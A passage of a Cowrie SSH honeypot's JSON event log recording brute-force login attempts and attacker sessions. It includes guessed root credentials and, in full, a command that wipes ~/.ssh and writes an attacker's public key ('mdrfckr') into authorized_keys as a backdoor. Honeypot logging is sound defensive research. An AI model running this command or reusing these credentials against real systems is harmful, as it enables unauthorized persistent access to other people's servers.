AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T06:22:13.129900Z","src_ip":"212.227.235.229","session":"8fdf258a9ce7"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T06:22:13.480587Z","src_ip":"212.227.235.229","session":"8fdf258a9ce7"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.4","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.4 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:22:13.481525Z","src_ip":"212.227.235.229","session":"8fdf258a9ce7"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":38354,"dst_ip":"1.2.3.4","dst_port":22,"session":"befeae288871","protocol":"ssh","message":"New connection: 212.227.235.229:38354 (1.2.3.4:22) [session: befeae288871]","sensor":"my-vps","timestamp":"2025-09-09T06:22:13.813730Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.9.6","message":"Remote SSH version: SSH-2.0-libssh_0.9.6","sensor":"my-vps","timestamp":"2025-09-09T06:22:13.814342Z","src_ip":"212.227.235.229","session":"befeae288871"}
{"eventid":"cowrie.client.kex","hassh":"f555226df1963d1d3c09daf865abdc9a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c;aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss"],"encCS":["aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: f555226df1963d1d3c09daf865abdc9a","sensor":"my-vps","timestamp":"2025-09-09T06:22:14.158695Z","src_ip":"212.227.235.229","session":"befeae288871"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T06:22:15.586262Z","src_ip":"212.227.235.229","session":"befeae288871"}
{"eventid":"cowrie.session.closed","duration":"3.1","message":"Connection lost after 3.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:22:16.942921Z","src_ip":"212.227.235.229","session":"befeae288871"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":39006,"dst_ip":"1.2.3.4","dst_port":22,"session":"7ee5c42564d3","protocol":"ssh","message":"New connection: 212.227.235.229:39006 (1.2.3.4:22) [session: 7ee5c42564d3]","sensor":"my-vps","timestamp":"2025-09-09T06:22:17.296112Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.9.6","message":"Remote SSH version: SSH-2.0-libssh_0.9.6","sensor":"my-vps","timestamp":"2025-09-09T06:22:17.297485Z","src_ip":"212.227.235.229","session":"7ee5c42564d3"}
{"eventid":"cowrie.client.kex","hassh":"f555226df1963d1d3c09daf865abdc9a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c;aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss"],"encCS":["aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: f555226df1963d1d3c09daf865abdc9a","sensor":"my-vps","timestamp":"2025-09-09T06:22:17.645969Z","src_ip":"212.227.235.229","session":"7ee5c42564d3"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T06:22:19.073509Z","src_ip":"212.227.235.229","session":"7ee5c42564d3"}
{"eventid":"cowrie.session.closed","duration":"9.9","message":"Connection lost after 9.9 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:22:19.453247Z","src_ip":"212.227.235.229","session":"8fdf258a9ce7"}
{"eventid":"cowrie.session.closed","duration":"2.2","message":"Connection lost after 2.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:22:19.456188Z","src_ip":"212.227.235.229","session":"7ee5c42564d3"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":58268,"dst_ip":"1.2.3.4","dst_port":22,"session":"19d4e6dfa3da","protocol":"ssh","message":"New connection: 212.227.235.229:58268 (1.2.3.4:22) [session: 19d4e6dfa3da]","sensor":"my-vps","timestamp":"2025-09-09T06:22:33.955097Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.9.6","message":"Remote SSH version: SSH-2.0-libssh_0.9.6","sensor":"my-vps","timestamp":"2025-09-09T06:22:33.957695Z","src_ip":"212.227.235.229","session":"19d4e6dfa3da"}
{"eventid":"cowrie.client.kex","hassh":"f555226df1963d1d3c09daf865abdc9a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c;aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss"],"encCS":["aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: f555226df1963d1d3c09daf865abdc9a","sensor":"my-vps","timestamp":"2025-09-09T06:22:34.132335Z","src_ip":"212.227.235.229","session":"19d4e6dfa3da"}
{"eventid":"cowrie.login.failed","username":"dixi","password":"09N1RCa1Hs31","message":"login attempt [dixi/09N1RCa1Hs31] failed","sensor":"my-vps","timestamp":"2025-09-09T06:22:34.816171Z","src_ip":"212.227.235.229","session":"19d4e6dfa3da"}
{"eventid":"cowrie.session.closed","duration":"2.0","message":"Connection lost after 2.0 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:22:35.988531Z","src_ip":"212.227.235.229","session":"19d4e6dfa3da"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":42519,"dst_ip":"1.2.3.4","dst_port":22,"session":"32c6720d102b","protocol":"ssh","message":"New connection: 212.227.235.229:42519 (1.2.3.4:22) [session: 32c6720d102b]","sensor":"my-vps","timestamp":"2025-09-09T06:22:41.658020Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.9.6","message":"Remote SSH version: SSH-2.0-libssh_0.9.6","sensor":"my-vps","timestamp":"2025-09-09T06:22:41.659268Z","src_ip":"212.227.235.229","session":"32c6720d102b"}
{"eventid":"cowrie.client.kex","hassh":"f555226df1963d1d3c09daf865abdc9a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c;aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss"],"encCS":["aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: f555226df1963d1d3c09daf865abdc9a","sensor":"my-vps","timestamp":"2025-09-09T06:22:42.011278Z","src_ip":"212.227.235.229","session":"32c6720d102b"}
{"eventid":"cowrie.login.success","username":"root","password":"welcome2025","message":"login attempt [root/welcome2025] succeeded","sensor":"my-vps","timestamp":"2025-09-09T06:22:43.440825Z","src_ip":"212.227.235.229","session":"32c6720d102b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T06:22:44.184178Z","src_ip":"212.227.235.229","session":"32c6720d102b"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T06:22:44.184989Z","src_ip":"212.227.235.229","session":"32c6720d102b"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T06:22:44.185803Z","src_ip":"212.227.235.229","session":"32c6720d102b"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.7","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.7 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:22:44.917645Z","src_ip":"212.227.235.229","session":"32c6720d102b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T06:22:45.326404Z","src_ip":"212.227.235.229","session":"32c6720d102b"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T06:22:45.327253Z","src_ip":"212.227.235.229","session":"32c6720d102b"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T06:22:45.676078Z","src_ip":"212.227.235.229","session":"32c6720d102b"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.4","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.4 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:22:45.676986Z","src_ip":"212.227.235.229","session":"32c6720d102b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":43540,"dst_ip":"1.2.3.4","dst_port":22,"session":"dc7fc18e4088","protocol":"ssh","message":"New connection: 212.227.235.229:43540 (1.2.3.4:22) [session: dc7fc18e4088]","sensor":"my-vps","timestamp":"2025-09-09T06:22:46.066891Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.9.6","message":"Remote SSH version: SSH-2.0-libssh_0.9.6","sensor":"my-vps","timestamp":"2025-09-09T06:22:46.067860Z","src_ip":"212.227.235.229","session":"dc7fc18e4088"}
{"eventid":"cowrie.session.connect","src_ip":"157.20.207.165","src_port":38958,"dst_ip":"1.2.3.4","dst_port":22,"session":"266eeff165b3","protocol":"ssh","message":"New connection: 157.20.207.165:38958 (1.2.3.4:22) [session: 266eeff165b3]","sensor":"my-vps","timestamp":"2025-09-09T06:22:46.184582Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T06:22:46.185627Z","src_ip":"157.20.207.165","session":"266eeff165b3"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T06:22:46.368809Z","src_ip":"157.20.207.165","session":"266eeff165b3"}
{"eventid":"cowrie.client.kex","hassh":"f555226df1963d1d3c09daf865abdc9a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c;aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss"],"encCS":["aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: f555226df1963d1d3c09daf865abdc9a","sensor":"my-vps","timestamp":"2025-09-09T06:22:46.445920Z","src_ip":"212.227.235.229","session":"dc7fc18e4088"}
{"eventid":"cowrie.login.failed","username":"dixi","password":"09N1RCa1Hs31","message":"login attempt [dixi/09N1RCa1Hs31] failed","sensor":"my-vps","timestamp":"2025-09-09T06:22:47.144444Z","src_ip":"157.20.207.165","session":"266eeff165b3"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T06:22:47.954433Z","src_ip":"212.227.235.229","session":"dc7fc18e4088"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:22:48.330040Z","src_ip":"157.20.207.165","session":"266eeff165b3"}
{"eventid":"cowrie.session.closed","duration":"3.3","message":"Connection lost after 3.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:22:49.379200Z","src_ip":"212.227.235.229","session":"dc7fc18e4088"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":44172,"dst_ip":"1.2.3.4","dst_port":22,"session":"89df585cb08f","protocol":"ssh","message":"New connection: 212.227.235.229:44172 (1.2.3.4:22) [session: 89df585cb08f]","sensor":"my-vps","timestamp":"2025-09-09T06:22:50.732798Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.9.6","message":"Remote SSH version: SSH-2.0-libssh_0.9.6","sensor":"my-vps","timestamp":"2025-09-09T06:22:50.733432Z","src_ip":"212.227.235.229","session":"89df585cb08f"}
{"eventid":"cowrie.client.kex","hassh":"f555226df1963d1d3c09daf865abdc9a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c;aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss"],"encCS":["aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: f555226df1963d1d3c09daf865abdc9a","sensor":"my-vps","timestamp":"2025-09-09T06:22:51.126467Z","src_ip":"212.227.235.229","session":"89df585cb08f"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T06:22:52.652869Z","src_ip":"212.227.235.229","session":"89df585cb08f"}
{"eventid":"cowrie.session.closed","duration":"11.3","message":"Connection lost after 11.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:22:52.994269Z","src_ip":"212.227.235.229","session":"32c6720d102b"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:22:52.995207Z","src_ip":"212.227.235.229","session":"89df585cb08f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":47426,"dst_ip":"1.2.3.4","dst_port":22,"session":"36d3cb60bbe8","protocol":"ssh","message":"New connection: 212.227.235.229:47426 (1.2.3.4:22) [session: 36d3cb60bbe8]","sensor":"my-vps","timestamp":"2025-09-09T06:22:57.546690Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T06:22:57.547739Z","src_ip":"212.227.235.229","session":"36d3cb60bbe8"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T06:22:57.837292Z","src_ip":"212.227.235.229","session":"36d3cb60bbe8"}
